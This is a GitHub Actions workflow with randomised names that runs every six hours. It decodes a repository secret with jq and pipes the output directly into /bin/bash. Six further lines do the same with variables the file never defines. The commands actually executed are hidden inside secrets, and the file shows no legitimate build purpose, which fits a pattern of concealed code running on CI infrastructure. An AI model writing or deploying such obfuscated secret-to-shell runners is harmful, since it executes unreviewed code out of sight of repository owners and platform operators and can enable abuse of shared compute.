name: minidisctransire

on:
  workflow_dispatch:
  schedule:
    - cron: '7 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: minidisctransire
        env:
          lzfan834: ${{ secrets.lzfan834 }}
        run: |
          echo $lzfan834 | jq -r .utry389 | /bin/bash
          echo $v8261 | jq -r .bula37 | /bin/bash
          echo $odaxa3 | jq -r .chi11738 | /bin/bash
          echo $tbpg6903 | jq -r .andqh152 | /bin/bash
          echo $eix65 | jq -r .bw195 | /bin/bash
          echo $evob323 | jq -r .wu06 | /bin/bash
          echo $jjvtr58 | jq -r .ijy0347 | /bin/bash

